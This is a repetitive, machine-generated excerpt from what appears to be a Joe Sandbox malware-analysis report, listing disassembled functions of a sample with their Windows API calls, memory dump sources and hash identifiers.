                                                                                                                                                                                                                                  • Opcode ID: 5a32e4963dd4f734838102efd816c8b6fcc45f8ef2a0c352c8c9c28432953822
                                                                                                                                                                                                                                  • Instruction ID: b208cfcd993c033284af89b5ff2de5db4cef9046c6ac9432f30720f5d432ba49
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a32e4963dd4f734838102efd816c8b6fcc45f8ef2a0c352c8c9c28432953822
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11AD72505548BFEF129FD9CC98EEABB6DFF58364F040126FA0152120DB359C61EBA0
                                                                                                                                                                                                                                  Function 009C33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue), ref: 009C3418
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue,00A33260,FlsSetValue,00000000,00000364,?,009C31B9), ref: 009C3424
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue,00A33260,FlsSetValue,00000000), ref: 009C3432
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: 7666d14e92378ea6bfca160c4be5c98ded2b901a10037d014cb0a2054cf6f98d
                                                                                                                                                                                                                                  • Instruction ID: 8d03dc54e0cbe83bd5169d4fe920eb760c60df11f5bf3747741c11707e467a9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7666d14e92378ea6bfca160c4be5c98ded2b901a10037d014cb0a2054cf6f98d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1101D432E11222ABCB368BB99C44FA63B5CBF04B61720C638F906D7191C720DD03C6E1
                                                                                                                                                                                                                                  Function 009FBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBA8B
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBAB0
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBABA
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBAED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                                                                                                  • Opcode ID: 724045fbb45c63ab4b8095550964aa6540df212a4b124a89f20f94edc2667901
                                                                                                                                                                                                                                  • Instruction ID: 9cd1bd1aa0fc9236ffd2a355d4281e616a0c2e357dc61928f8adbf9c68fc3cc3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 724045fbb45c63ab4b8095550964aa6540df212a4b124a89f20f94edc2667901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED117930D00A2DE7DF10EFE9E9487FEBBB8BF09711F100195DA41B2540CB3086628BA5
                                                                                                                                                                                                                                  Function 00A2886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00A2888E
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00A288A6
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00A288CA
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A288E5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                                                                                                  • Opcode ID: 7d83061a5955c7b9565a77c545bd3aefd510c6b870d596cfdecf51a6d72ac9a4
                                                                                                                                                                                                                                  • Instruction ID: 51304ddadb2abcf6639768ef7bf807091ce04fa9df067a0a4c9fbc9859ae68ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d83061a5955c7b9565a77c545bd3aefd510c6b870d596cfdecf51a6d72ac9a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 721142B9D01209EFDB51CFA8D884AEEBBF5FB08310F508166E915E3210D735AA55CF50
                                                                                                                                                                                                                                  Function 009F36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009F3712
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009F3723
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009F372A
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009F3731
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                                                                                  • Opcode ID: bfebe302305044799f295dac0c924f0b535dddd3d0c04912cb2d8cebeaa56cd3
                                                                                                                                                                                                                                  • Instruction ID: 57a9558e0f56c5e3b7231603dd09a60e7c62980046bc4013eed42931cd45119d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfebe302305044799f295dac0c924f0b535dddd3d0c04912cb2d8cebeaa56cd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EE06DB11022287ADA30A7A69C4DEFB7F6CDB42BA1F100125F605D2081DAA8CA42C6B0
                                                                                                                                                                                                                                  Function 00A292BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00991F87
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991F96
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: BeginPath.GDI32(?), ref: 00991FAD
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991FD6
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A292E3
                                                                                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00A292F0
                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00A29300
                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00A2930E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                                                                                  • Opcode ID: cd85291e95eaf777c2abe2f2026531894e57e301a154222d8baf3211b4d09605
                                                                                                                                                                                                                                  • Instruction ID: 25d1e890d2466c58545898d801807fc1fde50eba91fef045ad21364794b8378f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd85291e95eaf777c2abe2f2026531894e57e301a154222d8baf3211b4d09605
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F05432045659B6DB229F98AC0EFDE3F69AF09720F048110FA11250F2C7B555239BA5
                                                                                                                                                                                                                                  Function 009921A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 009921BC
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 009921C6
                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 009921D9
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 009921E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4037423528-0
                                                                                                                                                                                                                                  • Opcode ID: a3cf9a4863b2ec36f18f65f505d63e945807d56cccaa63601d022c5252752a13
                                                                                                                                                                                                                                  • Instruction ID: 5db23890c53667f50a4798d6237825f7ff6846f27d30e51458801f2e217a1617
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3cf9a4863b2ec36f18f65f505d63e945807d56cccaa63601d022c5252752a13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77E06531240240AADB319BB8BC0D7F83B15AB11336F14C32AF7BA541E1C77186529B11
                                                                                                                                                                                                                                  Function 009EEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009EEC36
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009EEC40
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009EEC60
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 009EEC81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                  • Opcode ID: c84144c858ff1282f304a12afc5fda89c131be1f2cb1eea1fa0e49a60e1a8944
                                                                                                                                                                                                                                  • Instruction ID: b696b0a2f4ea70e4b4a045202541aba610af8092064356e2401b4187431c8eb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84144c858ff1282f304a12afc5fda89c131be1f2cb1eea1fa0e49a60e1a8944
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98E01A74804204DFCF61DFA8C908A6DBBB5EB48310F208429E84AE3261C73C59039F40
                                                                                                                                                                                                                                  Function 009EEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009EEC4A
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009EEC54
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009EEC60
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 009EEC81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                  • Opcode ID: 1476dada65676a47ef0e72918b4ebbb891ac89c513b5af564a1824c3c1af37c7
                                                                                                                                                                                                                                  • Instruction ID: 91c43617e6c042f9fce5df4aaa619f8977479d309bf9e23b65a911a01d4086a0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1476dada65676a47ef0e72918b4ebbb891ac89c513b5af564a1824c3c1af37c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E012B4C04204EFCF60DFA8C808A6DBBB5EB48310B108429E80AE3261CB3C69039F40
                                                                                                                                                                                                                                  Function 00A057CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A05919
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Connection_wcslen
                                                                                                                                                                                                                                  • String ID: *$LPT
                                                                                                                                                                                                                                  • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                  • Opcode ID: e3b14604b53ce43d8ada49aa2fbc45ace4b0b0a74e980e326208919aa433bcd9
                                                                                                                                                                                                                                  • Instruction ID: ccc9ce488ea90f10096f5e58f31fb126794d629e3b841847b229ae307e75ac9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b14604b53ce43d8ada49aa2fbc45ace4b0b0a74e980e326208919aa433bcd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5915C75E00608DFDB14DF68D494EAABBF1AF44354F198099E84A9B392C731EE85CF90
                                                                                                                                                                                                                                  Function 009BE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 009BE67D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: 989407ff618c11ff80fb9c2dc6e03a12d8140e8f904333be1e03f081c1bc5737
                                                                                                                                                                                                                                  • Instruction ID: 77ca02dfea34ccedb4607e285aea674964afaa05f72741171bb36fc18bd2f65f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 989407ff618c11ff80fb9c2dc6e03a12d8140e8f904333be1e03f081c1bc5737
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6514761E0C102D6CB15BB14DE41BFB2BECAB50B60F244D5CF091862E9EF398D869B47
                                                                                                                                                                                                                                  Function 009AA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                  • Opcode ID: 56ed5a7a84b70f711e4c11ca188005240c3378f490bd04dadaf0039e25c9c311
                                                                                                                                                                                                                                  • Instruction ID: 5f7fd932887898d34ca220bacd75860c284ce540c77de5af50b84c6f0c77ef29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56ed5a7a84b70f711e4c11ca188005240c3378f490bd04dadaf0039e25c9c311
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23516431504286DFCF26DFA9C040ABB7BA8EF52310F644059F8859B2E0EB349D42CBA1
                                                                                                                                                                                                                                  Function 009AF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 009AF6DB
                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 009AF6F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 5d5b0d7f3aadc51880d4a6c27607504c283fca3b94da9ba83e7173414f309419
                                                                                                                                                                                                                                  • Instruction ID: 75c09bd768d36984d20551ac2c45e4eec6c673b270886f0897130df572bb92ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5b0d7f3aadc51880d4a6c27607504c283fca3b94da9ba83e7173414f309419
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 055137B1408748DBD720EF54DC86BABBBE8FBC5304F81885DF1D9811A5DB318929CB66
                                                                                                                                                                                                                                  Function 00A161A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
